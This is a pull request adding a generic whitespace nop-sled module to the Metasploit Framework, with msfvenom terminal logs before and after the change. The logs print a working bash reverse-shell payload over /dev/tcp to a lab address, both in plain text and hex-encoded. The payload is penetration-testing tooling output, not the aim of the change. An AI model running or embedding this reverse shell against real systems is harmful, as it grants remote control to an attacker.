### PR TITLE
Nops: Add cmd/generic

### DIFF
--- a/modules/nops/cmd/generic.rb
+++ b/modules/nops/cmd/generic.rb
@@ -1,0 +1,22 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Nop
+  def initialize
+    super(
+      'Name' => 'Generic Command Nop Generator',
+      'Alias' => 'cmd_generic',
+      'Description' => 'Generates harmless padding for command payloads.',
+      'Author' => ['hdm', 'bcoles'],
+      'License' => MSF_LICENSE,
+      'Arch' => ARCH_CMD)
+  end
+
+  # Generate valid commands up to the requested length
+  def generate_sled(length, _opts = {})
+    # Default to just spaces for now
+    ' ' * length
+  end
+end


### PR DESCRIPTION
Simple whitespace prefix Nop module for `ARCH_CMD` payloads.

hdm is attributed as an author as this Nop module is based entirely on his hard work in [nops/php/generic.rb](https://github.com/rapid7/metasploit-framework/blob/7d3bff66f04501bfa6a3114c56b05ebe849314cf/modules/nops/php/generic.rb). I couldn't have done it without him.

# Before

```
[2022-01-28 10:44:39] root@kali:~/Desktop/metasploit-framework# ./msfvenom -f python --pad-nops -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Error: undefined method `each_byte' for #<Array:0x00005620cce7e8f0>
Did you mean?  each_entry
```

```
[2022-01-28 10:44:50] root@kali:~/Desktop/metasploit-framework# ./msfvenom --pad-nops -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 10 bytes
[["x86/single_byte", Msf::Modules::Nop__X86__Single_byte::MetasploitModule], ["x86/opty2", Msf::Modules::Nop__X86__Opty2::MetasploitModule], ["x64/simple", Msf::Modules::Nop__X64__Simple::MetasploitModule], ["tty/generic", Msf::Modules::Nop__Tty__Generic::MetasploitModule], ["sparc/random", Msf::Modules::Nop__Sparc__Random::MetasploitModule], ["ppc/simple", Msf::Modules::Nop__Ppc__Simple::MetasploitModule], ["php/generic", Msf::Modules::Nop__Php__Generic::MetasploitModule], ["mipsbe/better", Msf::Modules::Nop__Mipsbe__Better::MetasploitModule], ["armle/simple", Msf::Modules::Nop__Armle__Simple::MetasploitModule], ["aarch64/simple", Msf::Modules::Nop__Aarch64__Simple::MetasploitModule]]
```

```
[2022-01-28 10:45:08] root@kali:~/Desktop/metasploit-framework# ./msfvenom -f python -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Error: undefined method `each_byte' for #<Array:0x000055d885eaec88>
Did you mean?  each_entry
```

```
[2022-01-28 10:45:16] root@kali:~/Desktop/metasploit-framework# ./msfvenom -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 10 bytes
[["x86/single_byte", Msf::Modules::Nop__X86__Single_byte::MetasploitModule], ["x86/opty2", Msf::Modules::Nop__X86__Opty2::MetasploitModule], ["x64/simple", Msf::Modules::Nop__X64__Simple::MetasploitModule], ["tty/generic", Msf::Modules::Nop__Tty__Generic::MetasploitModule], ["sparc/random", Msf::Modules::Nop__Sparc__Random::MetasploitModule], ["ppc/simple", Msf::Modules::Nop__Ppc__Simple::MetasploitModule], ["php/generic", Msf::Modules::Nop__Php__Generic::MetasploitModule], ["mipsbe/better", Msf::Modules::Nop__Mipsbe__Better::MetasploitModule], ["armle/simple", Msf::Modules::Nop__Armle__Simple::MetasploitModule], ["aarch64/simple", Msf::Modules::Nop__Aarch64__Simple::MetasploitModule]]
[2022-01-28 10:45:24] root@kali:~/Desktop/metasploit-framework# 
```


# After

```
[2022-01-28 10:42:06] root@kali:~/Desktop/metasploit-framework# ./msfvenom -f python --pad-nops -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Successfully added NOP sled of size 27 from cmd/generic
Payload size: 100 bytes
Final size of python file: 499 bytes
buf =  b""
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x62\x61\x73\x68\x20\x2d\x63\x20\x27\x30\x3c\x26"
buf += b"\x35\x34\x2d\x3b\x65\x78\x65\x63\x20\x35\x34\x3c\x3e"
buf += b"\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x37\x32\x2e"
buf += b"\x31\x36\x2e\x31\x39\x31\x2e\x31\x39\x32\x2f\x31\x33"
buf += b"\x33\x38\x3b\x73\x68\x20\x3c\x26\x35\x34\x20\x3e\x26"
buf += b"\x35\x34\x20\x32\x3e\x26\x35\x34\x27"
```

```
[2022-01-28 10:42:15] root@kali:~/Desktop/metasploit-framework# ./msfvenom --pad-nops -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Successfully added NOP sled of size 22 from cmd/generic
Payload size: 100 bytes
                      bash -c '0<&158-;exec 158<>/dev/tcp/172.16.191.192/1338;sh <&158 >&158 2>&158'
```

```
[2022-01-28 10:42:26] root@kali:~/Desktop/metasploit-framework# ./msfvenom -f python -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Successfully added NOP sled of size 100 from cmd/generic
Payload size: 173 bytes
Final size of python file: 857 bytes
buf =  b""
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
buf += b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x73\x68"
buf += b"\x20\x2d\x63\x20\x27\x30\x3c\x26\x38\x32\x2d\x3b\x65"
buf += b"\x78\x65\x63\x20\x38\x32\x3c\x3e\x2f\x64\x65\x76\x2f"
buf += b"\x74\x63\x70\x2f\x31\x37\x32\x2e\x31\x36\x2e\x31\x39"
buf += b"\x31\x2e\x31\x39\x32\x2f\x31\x33\x33\x38\x3b\x73\x68"
buf += b"\x20\x3c\x26\x38\x32\x20\x3e\x26\x38\x32\x20\x32\x3e"
buf += b"\x26\x38\x32\x27"
```

```
[2022-01-28 10:42:53] root@kali:~/Desktop/metasploit-framework# ./msfvenom -n 100 -p cmd/unix/reverse_bash "LHOST=172.16.191.192" LPORT=1338
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Successfully added NOP sled of size 100 from cmd/generic
Payload size: 173 bytes
                                                                                                    bash -c '0<&77-;exec 77<>/dev/tcp/172.16.191.192/1338;sh <&77 >&77 2>&77'
```
